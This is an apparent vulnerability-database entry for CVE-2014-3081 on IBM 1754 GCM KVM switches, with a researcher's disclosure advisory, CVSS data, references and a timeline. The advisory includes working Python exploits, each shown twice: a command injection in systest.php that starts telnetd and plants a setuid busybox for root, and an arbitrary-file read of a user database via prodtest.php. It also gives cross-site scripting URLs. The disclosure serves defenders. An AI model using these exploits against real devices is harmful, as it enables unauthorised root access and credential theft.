VAR-201408-0280
Vulnerability from variot - Updated: 2025-04-13 23:05prodtest.php on IBM GCM16 and GCM32 Global Console Manager switches with firmware before 1.20.20.23447 allows remote authenticated users to read arbitrary files via the filename parameter. An attacker can exploit this issue to read an arbitrary files in the context of the user running the application. IBM 1754 GCM16 and GCM32 Global Console Managers (GCM) are both 1754 series KVM switch products of IBM Corporation in the United States. The product supports AES encryption, LDAP and smart card/common access card (CAC) readers and more, enabling centralized authentication and local or remote system access. Product description The IBM 1754 GCM family provides KVM over IP and serial console management technology in a single appliance. Versions v1.20.0.22575 and prior are vulnerables. Note that this vulnerability is also present in some DELL and probably other vendors of this rebranded KVM. I contacted Dell but no response has been received.
*1. Remote code execution * CVEID: CVE-2014-2085 Description: Improperly sanitized input may allow a remote authenticated attacker to perform remote code execution on the GCM KVM switch. PoC of this vulnerability:
!/usr/bin/python"""
Exploit for Avocent KVM switch v1.20.0.22575. Remote code execution with privilege elevation. SessionId (avctSessionId) is neccesary for this to work, so you need a valid user. Default user is "Admin" with blank password. After running exploit, connect using telnet to device with user target (pass: target) then do "/tmp/su -" to gain root (password "root") alex.a.bravo@gmail.com """
from StringIO import StringIO import pycurl import os
sessid = "1111111111" target = "192.168.0.10"
durl = "https://" + target + "/systest.php?lpres=;%20/usr/ sbin/telnetd%20;%20cp%20/bin/busybox%20/tmp/su%20;%20chmod% 206755%20/tmp/su%20;"
storage = StringIO() c = pycurl.Curl() c.setopt(c.URL, durl) c.setopt(c.SSL_VERIFYPEER,0) c.setopt(c.SSL_VERIFYHOST,0) c.setopt(c.WRITEFUNCTION,storage.write) c.setopt(c.COOKIE,'avctSessionId=' + sessid)
try: print "[] Sending GET to " + target + " with session id " + sessid + "..." c.perform() c.close() except: print "" finally: print "[] Done" print "[] Trying telnet..." print "[] Login as target/target, then do /tmp/su - and enter password \"root\"" os.system("telnet " + target)
*2. Files can be anywhere on the target. SessionId (avctSessionId) is neccesary for this to work, so you need a valid user. alex.a.bravo@gmail.com """
from StringIO import StringIO import pycurl
sessid = "1111111111" target = "192.168.0.10" file = "/etc/IBM_user.dat"
durl = "https://" + target + "/prodtest.php?engage=video_ bits&display=results&filename=" + file
storage = StringIO() c = pycurl.Curl() c.setopt(c.URL, durl) c.setopt(c.SSL_VERIFYPEER,0) c.setopt(c.SSL_VERIFYHOST,0) c.setopt(c.WRITEFUNCTION,storage.write) c.setopt(c.COOKIE,'avctSessionId=' + sessid)
try: c.perform() c.close() except: print ""
content = storage.getvalue() print content.replace("","").replace("","")
3. Cross site scripting non-persistent CVEID: CVE-2014-3080 Description: System is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.
Examples: http://kvm/kvm.cgi?%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E https://kvm/avctalert.php?arg1=dadadasdasd&arg2=dasdasdas&key=%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E
Vendor Response: IBM release 1.20.20.23447 firmware
Timeline: 2014-05-20 - Vendor (PSIRT) notified 2014-05-21 - Vendor assigns internal ID 2014-07-16 - Patch Disclosed 2014-07-17 - Vulnerability disclosed
External Information: Info about the vulnerability (spanish): http://www.bitcloud.es/2014/07/tres-nuevas-vulnerabilidades-en-ibm-gcm.html IBM Security Bulletin: http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5095983
--
Alejandro Alvarez Bravo alex.a.bravo@gmail.com
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201408-0280",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "global console manager 32",
"scope": "lte",
"trust": 1.0,
"vendor": "ibm",
"version": "1.20.0.22575"
},
{
"model": "global console manager 16",
"scope": "lte",
"trust": 1.0,
"vendor": "ibm",
"version": "1.20.0.22575"
},
{
"model": "1754 gcm16 global console manager",
"scope": "lt",
"trust": 0.8,
"vendor": "ibm",
"version": "1.20.20.23447"
},
{
"model": "1754 gcm32 global console manager",
"scope": "lt",
"trust": 0.8,
"vendor": "ibm",
"version": "1.20.20.23447"
},
{
"model": "global console manager 16",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "1.20.0.22575"
},
{
"model": "global console manager 32",
"scope": "eq",
"trust": 0.6,
"vendor": "ibm",
"version": "1.20.0.22575"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-003832"
},
{
"db": "CNNVD",
"id": "CNNVD-201407-676"
},
{
"db": "NVD",
"id": "CVE-2014-3081"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:ibm:global_console_manager_16_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:ibm:global_console_manager_32_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-003832"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Alejandro Alvarez Bravo",
"sources": [
{
"db": "BID",
"id": "68779"
},
{
"db": "PACKETSTORM",
"id": "127543"
},
{
"db": "CNNVD",
"id": "CNNVD-201407-676"
}
],
"trust": 1.0
},
"cve": "CVE-2014-3081",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.8,
"id": "CVE-2014-3081",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:S/C:C/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 6.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.8,
"id": "VHN-71020",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:S/C:C/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2014-3081",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2014-3081",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-201407-676",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-71020",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-71020"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-003832"
},
{
"db": "CNNVD",
"id": "CNNVD-201407-676"
},
{
"db": "NVD",
"id": "CVE-2014-3081"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "prodtest.php on IBM GCM16 and GCM32 Global Console Manager switches with firmware before 1.20.20.23447 allows remote authenticated users to read arbitrary files via the filename parameter. \nAn attacker can exploit this issue to read an arbitrary files in the context of the user running the application. IBM 1754 GCM16 and GCM32 Global Console Managers (GCM) are both 1754 series KVM switch products of IBM Corporation in the United States. The product supports AES encryption, LDAP and smart card/common access card (CAC) readers and more, enabling centralized authentication and local or remote system access. *Product description*\n The IBM 1754 GCM family provides KVM over IP and serial console management\ntechnology in a single appliance. Versions v1.20.0.22575 and prior are\nvulnerables. \n Note that this vulnerability is also present in some DELL and probably\nother vendors of this rebranded KVM. I contacted Dell but no response has\nbeen received. \n\n *1. Remote code execution *\n CVEID: CVE-2014-2085\n Description: Improperly sanitized input may allow a remote authenticated\nattacker to perform remote code execution on the GCM KVM switch. \n PoC of this vulnerability:\n\n#!/usr/bin/python\"\"\"\nExploit for Avocent KVM switch v1.20.0.22575. \nRemote code execution with privilege elevation. \nSessionId (avctSessionId) is neccesary for this to work, so you need a\nvalid user. Default user is \"Admin\" with blank password. \nAfter running exploit, connect using telnet to device with user target\n(pass: target) then do \"/tmp/su -\" to gain root (password \"root\")\nalex.a.bravo@gmail.com\n\"\"\"\n\nfrom StringIO import StringIO\nimport pycurl\nimport os\n\nsessid = \"1111111111\"\ntarget = \"192.168.0.10\"\n\ndurl = \"https://\" + target + \"/systest.php?lpres=;%20/usr/\nsbin/telnetd%20;%20cp%20/bin/busybox%20/tmp/su%20;%20chmod%\n206755%20/tmp/su%20;\"\n\nstorage = StringIO()\nc = pycurl.Curl()\nc.setopt(c.URL, durl)\nc.setopt(c.SSL_VERIFYPEER,0)\nc.setopt(c.SSL_VERIFYHOST,0)\nc.setopt(c.WRITEFUNCTION,storage.write)\nc.setopt(c.COOKIE,\u0027avctSessionId=\u0027 + sessid)\n\ntry:\n print \"[*] Sending GET to \" + target + \" with session id \" + sessid\n+ \"...\"\n c.perform()\n c.close()\nexcept:\n print \"\"\nfinally:\n print \"[*] Done\"\nprint \"[*] Trying telnet...\"\nprint \"[*] Login as target/target, then do /tmp/su - and enter password\n\\\"root\\\"\"\nos.system(\"telnet \" + target)\n\n*2. Files can be anywhere on the target. \nSessionId (avctSessionId) is neccesary for this to work, so you need a\nvalid user. \nalex.a.bravo@gmail.com\n\"\"\"\n\nfrom StringIO import StringIO\nimport pycurl\n\nsessid = \"1111111111\"\ntarget = \"192.168.0.10\"\nfile = \"/etc/IBM_user.dat\"\n\ndurl = \"https://\" + target + \"/prodtest.php?engage=video_\nbits\u0026display=results\u0026filename=\" + file\n\nstorage = StringIO()\nc = pycurl.Curl()\nc.setopt(c.URL, durl)\nc.setopt(c.SSL_VERIFYPEER,0)\nc.setopt(c.SSL_VERIFYHOST,0)\nc.setopt(c.WRITEFUNCTION,storage.write)\nc.setopt(c.COOKIE,\u0027avctSessionId=\u0027 + sessid)\n\ntry:\n c.perform()\n c.close()\nexcept:\n print \"\"\n\ncontent = storage.getvalue()\nprint content.replace(\"\u003ctd\u003e\",\"\").replace(\"\u003c/td\u003e\",\"\")\n\n*3. Cross site scripting non-persistent*\n CVEID: CVE-2014-3080\n Description: System is vulnerable to cross-site scripting, caused by\nimproper validation of user-supplied input. A remote attacker could exploit\nthis vulnerability using a specially-crafted URL to execute script in a\nvictim\u0027s Web browser within the security context of the hosting Web site,\nonce the URL is clicked. An attacker could use this vulnerability to steal\nthe victim\u0027s cookie-based authentication credentials. \n\n Examples:\nhttp://kvm/kvm.cgi?%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E\nhttps://kvm/avctalert.php?arg1=dadadasdasd\u0026arg2=dasdasdas\u0026key=%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E\n\n*Vendor Response:*\nIBM release 1.20.20.23447 firmware\n\n*Timeline:*\n2014-05-20 - Vendor (PSIRT) notified\n2014-05-21 - Vendor assigns internal ID\n2014-07-16 - Patch Disclosed\n2014-07-17 - Vulnerability disclosed\n\n*External Information:*\nInfo about the vulnerability (spanish):\nhttp://www.bitcloud.es/2014/07/tres-nuevas-vulnerabilidades-en-ibm-gcm.html\nIBM Security Bulletin:\nhttp://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5095983\n\n-- \n--\nAlejandro Alvarez Bravo\nalex.a.bravo@gmail.com\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-3081"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-003832"
},
{
"db": "BID",
"id": "68779"
},
{
"db": "VULHUB",
"id": "VHN-71020"
},
{
"db": "PACKETSTORM",
"id": "127543"
}
],
"trust": 2.07
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-71020",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-71020"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-3081",
"trust": 2.9
},
{
"db": "EXPLOIT-DB",
"id": "34132",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "127543",
"trust": 1.2
},
{
"db": "BID",
"id": "68779",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2014-003832",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201407-676",
"trust": 0.7
},
{
"db": "SECUNIA",
"id": "60260",
"trust": 0.6
},
{
"db": "XF",
"id": "93930",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-71020",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-71020"
},
{
"db": "BID",
"id": "68779"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-003832"
},
{
"db": "PACKETSTORM",
"id": "127543"
},
{
"db": "CNNVD",
"id": "CNNVD-201407-676"
},
{
"db": "NVD",
"id": "CVE-2014-3081"
}
]
},
"id": "VAR-201408-0280",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-71020"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-13T23:05:08.333000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "MIGR-5095983",
"trust": 0.8,
"url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095983"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-003832"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-200",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-71020"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-003832"
},
{
"db": "NVD",
"id": "CVE-2014-3081"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095983"
},
{
"trust": 1.7,
"url": "http://www.exploit-db.com/exploits/34132/"
},
{
"trust": 1.1,
"url": "http://seclists.org/fulldisclosure/2014/jul/113"
},
{
"trust": 1.1,
"url": "http://packetstormsecurity.com/files/127543/ibm-1754-gcm-kvm-code-execution-file-read-xss.html"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/93930"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3081"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-3081"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/93930"
},
{
"trust": 0.6,
"url": "http://secunia.com/advisories/60260"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/68779"
},
{
"trust": 0.1,
"url": "http://kvm/kvm.cgi?%3cscript%3ealert%28%22aaa%22%29%3c/script%3e"
},
{
"trust": 0.1,
"url": "https://\""
},
{
"trust": 0.1,
"url": "http://www.bitcloud.es/2014/07/tres-nuevas-vulnerabilidades-en-ibm-gcm.html"
},
{
"trust": 0.1,
"url": "https://kvm/avctalert.php?arg1=dadadasdasd\u0026arg2=dasdasdas\u0026key=%3cscript%3ealert%28%22aaa%22%29%3c/script%3e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-2085"
},
{
"trust": 0.1,
"url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095983"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-3080"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-3081"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-71020"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-003832"
},
{
"db": "PACKETSTORM",
"id": "127543"
},
{
"db": "CNNVD",
"id": "CNNVD-201407-676"
},
{
"db": "NVD",
"id": "CVE-2014-3081"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-71020"
},
{
"db": "BID",
"id": "68779"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-003832"
},
{
"db": "PACKETSTORM",
"id": "127543"
},
{
"db": "CNNVD",
"id": "CNNVD-201407-676"
},
{
"db": "NVD",
"id": "CVE-2014-3081"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-08-17T00:00:00",
"db": "VULHUB",
"id": "VHN-71020"
},
{
"date": "2014-07-14T00:00:00",
"db": "BID",
"id": "68779"
},
{
"date": "2014-08-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-003832"
},
{
"date": "2014-07-21T19:57:35",
"db": "PACKETSTORM",
"id": "127543"
},
{
"date": "2014-07-29T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201407-676"
},
{
"date": "2014-08-17T23:55:06.887000",
"db": "NVD",
"id": "CVE-2014-3081"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-08-29T00:00:00",
"db": "VULHUB",
"id": "VHN-71020"
},
{
"date": "2014-07-22T06:39:00",
"db": "BID",
"id": "68779"
},
{
"date": "2014-08-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-003832"
},
{
"date": "2014-08-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201407-676"
},
{
"date": "2025-04-12T10:46:40.837000",
"db": "NVD",
"id": "CVE-2014-3081"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201407-676"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "IBM GCM16 and GCM32 Global Console Manager Switch firmware prodtest.php Vulnerable to reading arbitrary files",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-003832"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201407-676"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…